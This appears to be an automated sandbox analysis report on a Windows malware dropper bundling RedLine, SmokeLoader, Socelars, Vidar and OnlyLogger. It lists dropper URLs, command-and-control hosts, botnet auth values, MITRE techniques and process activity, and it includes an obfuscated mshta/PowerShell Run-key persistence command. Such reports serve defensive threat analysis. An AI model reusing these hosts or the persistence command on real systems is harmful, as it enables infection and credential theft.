onlylogger | 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6

Analysis

max time kernel
143s
max time network
164s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
10-03-2022 03:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe
Size

4.2MB
MD5

63c2c40cfa3ba6928b82cd1433f1167d
SHA1

28af8a5a3ba4e050c558c34e422d78c2ac240b43
SHA256

699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6
SHA512

a8a0eadd9bb9f795856b07e5b4ec4bd3ae18446436448f949c40e049a823ff5c742639b0b196f3b59582567c5e461a2500e0b446c8662ea873dc310d1377774d

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.192/-RED/NAN.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.192/-RED/NON.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.192/-RED/RED.oo

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.wygexde.xyz/

https://sa-us-bucket.s3.us-east-2.amazonaws.com/asdhjk/

Extracted

Family

smokeloader

Version

2020

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

Travis

5.182.5.22:33809

Attributes

auth_value
6fa3251b9d70327e7d1e5851c226af23

Extracted

Family

redline

Botnet

fdfsdf

86.107.197.196:63065

Attributes

auth_value
49c341b88f13528ba52befa3c6ca7ebb

Extracted

Family

redline

Botnet

jack

5.182.5.203:33873

Attributes

auth_value
6d03d90d7d897b871fe8bfcaec8c6ae0

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 832 3588 rUNdlL32.eXe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	832	3588	rUNdlL32.eXe

RedLine Payload 9 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3340-377-0x0000000000140000-0x0000000000361000-memory.dmp	family_redline
behavioral2/memory/4340-388-0x0000000000F10000-0x0000000000F30000-memory.dmp	family_redline
behavioral2/memory/3284-405-0x0000000000C70000-0x0000000000E93000-memory.dmp	family_redline
behavioral2/memory/3284-432-0x0000000000C70000-0x0000000000E93000-memory.dmp	family_redline
behavioral2/memory/3284-408-0x0000000000C70000-0x0000000000E93000-memory.dmp	family_redline
behavioral2/memory/3340-390-0x0000000000140000-0x0000000000361000-memory.dmp	family_redline
behavioral2/memory/3284-389-0x0000000000C70000-0x0000000000E93000-memory.dmp	family_redline
C:\Users\Admin\Documents\3um2ASQgdHK5qhmvaTd2nHR7.exe	family_redline
behavioral2/memory/3340-370-0x0000000000140000-0x0000000000361000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Installation.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Installation.exe	family_socelars
C:\Users\Admin\Documents\JyIHoBk_ZcAJMkpXEDxdKejd.exe	family_socelars
C:\Users\Admin\Documents\JyIHoBk_ZcAJMkpXEDxdKejd.exe	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

OnlyLogger Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4268-178-0x00000000005B0000-0x00000000005E0000-memory.dmp	family_onlylogger
behavioral2/memory/4268-179-0x0000000000400000-0x0000000000464000-memory.dmp	family_onlylogger
behavioral2/memory/3372-430-0x0000000000400000-0x0000000000492000-memory.dmp	family_onlylogger
behavioral2/memory/3372-420-0x0000000002120000-0x0000000002164000-memory.dmp	family_onlylogger

Blocklisted process makes network request 9 IoCs

Processes:

cmd.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
223	2228	cmd.exe
227	2228	cmd.exe
237	2228	cmd.exe
241	2228	cmd.exe
268	5916	powershell.exe
269	5976	powershell.exe
270	6028	powershell.exe
275	6028	powershell.exe
270	6028	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 35 IoCs

Processes:

Files.exeFile.exeInstall.exeKRSetp.exeFolder.exejg3_3uag.exeInstallation.exepub2.exeInfo.exepzyh.exeFolder.exejfiag3g_gg.exejfiag3g_gg.exeZLQHmcinqrtmxG29JeWHldZs.exefHSnWneP5Q6EoIhPpSeU5djN.exesJhVl0NkN0zJV8udxG08WE7g.exewu1bLlMbnJY1fSGdGO5pnIe7.exeCd9sx7e1hcpQNdlgHi0TDACn.exeWerFault.exeZJdaWucTUPWvvHp7cyQhgO6f.exe_0y86lmH_Y5w2jgAjGURyIoy.exedzAnISXyBAB9TJgfQpiJNqgn.execmd.exeVqpRmeW35ZNTRZEr_XdyQtZF.exef2lCpeMBm5aZjIxJZYyknrN9.exekfIx4AeXaIwJT4gAZvt28Hop.exeVkqg65q1o6YbJlG1k8WTpH4b.exehg6o6ShsofU_l9G5bh1ptRCJ.exelWIxRZFsQrh1cFnOUnJtWK7Z.exeYK5kC4ak2RRcQ9kSdeWgayqF.exeInstall.exeInstall.exe_0y86lmH_Y5w2jgAjGURyIoy.exe_0y86lmH_Y5w2jgAjGURyIoy.exeAccostarmi.exe.pif

pid	process
2556	Files.exe
5096	File.exe
4268	Install.exe
444	KRSetp.exe
4628	Folder.exe
4072	jg3_3uag.exe
2400	Installation.exe
1684	pub2.exe
4776	Info.exe
4308	pzyh.exe
3396	Folder.exe
3440	jfiag3g_gg.exe
1572	jfiag3g_gg.exe
2452	ZLQHmcinqrtmxG29JeWHldZs.exe
480	fHSnWneP5Q6EoIhPpSeU5djN.exe
3340	sJhVl0NkN0zJV8udxG08WE7g.exe
3372	wu1bLlMbnJY1fSGdGO5pnIe7.exe
2432	Cd9sx7e1hcpQNdlgHi0TDACn.exe
4340	WerFault.exe
3284	ZJdaWucTUPWvvHp7cyQhgO6f.exe
5060	_0y86lmH_Y5w2jgAjGURyIoy.exe
4532	dzAnISXyBAB9TJgfQpiJNqgn.exe
2228	cmd.exe
1572	VqpRmeW35ZNTRZEr_XdyQtZF.exe
3076	f2lCpeMBm5aZjIxJZYyknrN9.exe
3636	kfIx4AeXaIwJT4gAZvt28Hop.exe
5212	Vkqg65q1o6YbJlG1k8WTpH4b.exe
5220	hg6o6ShsofU_l9G5bh1ptRCJ.exe
5236	lWIxRZFsQrh1cFnOUnJtWK7Z.exe
5408	YK5kC4ak2RRcQ9kSdeWgayqF.exe
5872	Install.exe
5360	Install.exe
5772	_0y86lmH_Y5w2jgAjGURyIoy.exe
4704	_0y86lmH_Y5w2jgAjGURyIoy.exe
3008	Accostarmi.exe.pif

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\Documents\Cd9sx7e1hcpQNdlgHi0TDACn.exe	upx
C:\Users\Admin\Documents\Cd9sx7e1hcpQNdlgHi0TDACn.exe	upx

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe	vmprotect
behavioral2/memory/4072-144-0x0000000000400000-0x0000000000664000-memory.dmp	vmprotect

Checks BIOS information in registry 2 TTPs 3 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exelWIxRZFsQrh1cFnOUnJtWK7Z.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	lWIxRZFsQrh1cFnOUnJtWK7Z.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	lWIxRZFsQrh1cFnOUnJtWK7Z.exe

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

kfIx4AeXaIwJT4gAZvt28Hop.exehg6o6ShsofU_l9G5bh1ptRCJ.exewu1bLlMbnJY1fSGdGO5pnIe7.exe699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exeFiles.exeFolder.exeInfo.exefHSnWneP5Q6EoIhPpSeU5djN.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	kfIx4AeXaIwJT4gAZvt28Hop.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	hg6o6ShsofU_l9G5bh1ptRCJ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	wu1bLlMbnJY1fSGdGO5pnIe7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Files.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Folder.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Info.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	fHSnWneP5Q6EoIhPpSeU5djN.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Install.exe

Loads dropped DLL 4 IoCs

Processes:

rundll32.exepub2.exefHSnWneP5Q6EoIhPpSeU5djN.exe

pid process

3808 rundll32.exe
1684 pub2.exe
480 fHSnWneP5Q6EoIhPpSeU5djN.exe
480 fHSnWneP5Q6EoIhPpSeU5djN.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3808	rundll32.exe
1684	pub2.exe
480	fHSnWneP5Q6EoIhPpSeU5djN.exe
480	fHSnWneP5Q6EoIhPpSeU5djN.exe

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/5236-419-0x00007FF6F6320000-0x00007FF6F68CE000-memory.dmp	themida
behavioral2/memory/5236-414-0x00007FF6F6320000-0x00007FF6F68CE000-memory.dmp	themida

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

pzyh.exemsedge.exepowershell.exeYK5kC4ak2RRcQ9kSdeWgayqF.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e"	pzyh.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FaxOptions = "mshta vbscript:(CreateObject(\"WS\"+\"C\"+\"rI\"+\"Pt.ShEll\")).Run(\"powershell [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\\Microsoft\\Fax').GetValue('Drivers')).EntryPoint.Invoke(0,@())\",0)(window.close)"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Eyxrppteq = "\"C:\\Users\\Admin\\AppData\\Roaming\\Mzpexsf\\Eyxrppteq.exe\""	YK5kC4ak2RRcQ9kSdeWgayqF.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

jg3_3uag.exelWIxRZFsQrh1cFnOUnJtWK7Z.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg3_3uag.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	lWIxRZFsQrh1cFnOUnJtWK7Z.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

25 ip-api.com
274 ipinfo.io
18 ipinfo.io
19 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

flow	ioc
25	ip-api.com
274	ipinfo.io
18	ipinfo.io
19	ipinfo.io

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe	autoit_exe

Drops file in System32 directory 1 IoCs

Processes:

Install.exe

description ioc process

File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

sJhVl0NkN0zJV8udxG08WE7g.exeZJdaWucTUPWvvHp7cyQhgO6f.exe

pid process

3340 sJhVl0NkN0zJV8udxG08WE7g.exe
3284 ZJdaWucTUPWvvHp7cyQhgO6f.exe

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

pid	process
3340	sJhVl0NkN0zJV8udxG08WE7g.exe
3284	ZJdaWucTUPWvvHp7cyQhgO6f.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

_0y86lmH_Y5w2jgAjGURyIoy.exepowershell.exepowershell.exeYK5kC4ak2RRcQ9kSdeWgayqF.exe

description	pid	process	target process
PID 5060 set thread context of 4704	5060	_0y86lmH_Y5w2jgAjGURyIoy.exe	_0y86lmH_Y5w2jgAjGURyIoy.exe
PID 5916 set thread context of 5948	5916	powershell.exe	RegAsm.exe
PID 5976 set thread context of 5532	5976	powershell.exe	RegSvcs.exe
PID 5408 set thread context of 4688	5408	YK5kC4ak2RRcQ9kSdeWgayqF.exe	MSBuild.exe

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\da0ae165-d20f-415a-ad77-e11e96c1d44d.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220310033717.pma	setup.exe

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job	schtasks.exe

Program crash 16 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3544	3808	WerFault.exe	rundll32.exe
5780	3076	WerFault.exe
5800	1572	WerFault.exe	VqpRmeW35ZNTRZEr_XdyQtZF.exe
2552	3372	WerFault.exe	wu1bLlMbnJY1fSGdGO5pnIe7.exe
5868	1572	WerFault.exe	VqpRmeW35ZNTRZEr_XdyQtZF.exe
4192	3076	WerFault.exe
536	2452	WerFault.exe
5224	3372	WerFault.exe	wu1bLlMbnJY1fSGdGO5pnIe7.exe
5528	3372	WerFault.exe	wu1bLlMbnJY1fSGdGO5pnIe7.exe
5352	2452	WerFault.exe
2552	3372	WerFault.exe	wu1bLlMbnJY1fSGdGO5pnIe7.exe
4656	3372	WerFault.exe	wu1bLlMbnJY1fSGdGO5pnIe7.exe
5280	3372	WerFault.exe	wu1bLlMbnJY1fSGdGO5pnIe7.exe
3700	3372	WerFault.exe	wu1bLlMbnJY1fSGdGO5pnIe7.exe
6140	3372	WerFault.exe	wu1bLlMbnJY1fSGdGO5pnIe7.exe
4340	5532	WerFault.exe	RegSvcs.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

fHSnWneP5Q6EoIhPpSeU5djN.exepowershell.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	fHSnWneP5Q6EoIhPpSeU5djN.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	powershell.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	fHSnWneP5Q6EoIhPpSeU5djN.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

5144 schtasks.exe
5012 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

6012 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

4760 tasklist.exe
4956 tasklist.exe

pid	process
5144	schtasks.exe
5012	schtasks.exe

pid	process
6012	timeout.exe

pid	process
4760	tasklist.exe
4956	tasklist.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exemsedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe

Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4204 taskkill.exe
4804 taskkill.exe
5080 taskkill.exe
3444 taskkill.exe
Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe

pid	process
4204	taskkill.exe
4804	taskkill.exe
5080	taskkill.exe
3444	taskkill.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

cmd.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	cmd.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	cmd.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exejfiag3g_gg.exepub2.exeidentity_helper.exe

pid	process
4756	msedge.exe
4756	msedge.exe
2256	msedge.exe
2256	msedge.exe
1572	jfiag3g_gg.exe
1572	jfiag3g_gg.exe
1684	pub2.exe
1684	pub2.exe
4420	identity_helper.exe
4420	identity_helper.exe
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

1684 pub2.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

Processes:

msedge.exe

pid process

2256 msedge.exe
2256 msedge.exe
2256 msedge.exe
2256 msedge.exe
2256 msedge.exe

pid	process
1684	pub2.exe

pid	process
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Installation.exeKRSetp.exetaskkill.exesvchost.exejg3_3uag.execmd.exe

description	pid	process
Token: SeCreateTokenPrivilege	2400	Installation.exe
Token: SeAssignPrimaryTokenPrivilege	2400	Installation.exe
Token: SeLockMemoryPrivilege	2400	Installation.exe
Token: SeIncreaseQuotaPrivilege	2400	Installation.exe
Token: SeMachineAccountPrivilege	2400	Installation.exe
Token: SeTcbPrivilege	2400	Installation.exe
Token: SeSecurityPrivilege	2400	Installation.exe
Token: SeTakeOwnershipPrivilege	2400	Installation.exe
Token: SeLoadDriverPrivilege	2400	Installation.exe
Token: SeSystemProfilePrivilege	2400	Installation.exe
Token: SeSystemtimePrivilege	2400	Installation.exe
Token: SeProfSingleProcessPrivilege	2400	Installation.exe
Token: SeIncBasePriorityPrivilege	2400	Installation.exe
Token: SeCreatePagefilePrivilege	2400	Installation.exe
Token: SeCreatePermanentPrivilege	2400	Installation.exe
Token: SeBackupPrivilege	2400	Installation.exe
Token: SeRestorePrivilege	2400	Installation.exe
Token: SeShutdownPrivilege	2400	Installation.exe
Token: SeDebugPrivilege	2400	Installation.exe
Token: SeAuditPrivilege	2400	Installation.exe
Token: SeSystemEnvironmentPrivilege	2400	Installation.exe
Token: SeChangeNotifyPrivilege	2400	Installation.exe
Token: SeRemoteShutdownPrivilege	2400	Installation.exe
Token: SeUndockPrivilege	2400	Installation.exe
Token: SeSyncAgentPrivilege	2400	Installation.exe
Token: SeEnableDelegationPrivilege	2400	Installation.exe
Token: SeManageVolumePrivilege	2400	Installation.exe
Token: SeImpersonatePrivilege	2400	Installation.exe
Token: SeCreateGlobalPrivilege	2400	Installation.exe
Token: 31	2400	Installation.exe
Token: 32	2400	Installation.exe
Token: 33	2400	Installation.exe
Token: 34	2400	Installation.exe
Token: 35	2400	Installation.exe
Token: SeDebugPrivilege	444	KRSetp.exe
Token: SeDebugPrivilege	3444	taskkill.exe
Token: SeTcbPrivilege	5024	svchost.exe
Token: SeTcbPrivilege	5024	svchost.exe
Token: SeTcbPrivilege	5024	svchost.exe
Token: SeTcbPrivilege	5024	svchost.exe
Token: SeTcbPrivilege	5024	svchost.exe
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeManageVolumePrivilege	4072	jg3_3uag.exe
Token: SeManageVolumePrivilege	4072	jg3_3uag.exe
Token: SeManageVolumePrivilege	4072	jg3_3uag.exe
Token: SeManageVolumePrivilege	4072	jg3_3uag.exe
Token: SeManageVolumePrivilege	4072	jg3_3uag.exe
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeCreateTokenPrivilege	2228	cmd.exe
Token: SeAssignPrimaryTokenPrivilege	2228	cmd.exe
Token: SeLockMemoryPrivilege	2228	cmd.exe
Token: SeIncreaseQuotaPrivilege	2228	cmd.exe
Token: SeMachineAccountPrivilege	2228	cmd.exe
Token: SeTcbPrivilege	2228	cmd.exe

Suspicious use of FindShellTrayWindow 39 IoCs

Processes:

File.exemsedge.exeAccostarmi.exe.pif

pid	process
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
2256	msedge.exe
5096	File.exe
5096	File.exe
2256	msedge.exe
5096	File.exe
